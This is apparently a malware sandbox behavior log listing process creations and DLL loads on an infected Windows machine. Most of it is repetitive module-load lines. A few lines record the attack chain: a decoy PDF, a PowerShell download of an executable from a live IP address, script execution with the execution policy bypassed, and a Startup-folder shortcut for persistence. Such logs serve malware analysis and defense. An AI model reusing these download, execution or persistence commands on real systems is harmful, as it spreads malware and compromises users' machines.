Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1684,i,8099529981057222917,3572816472393853467,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
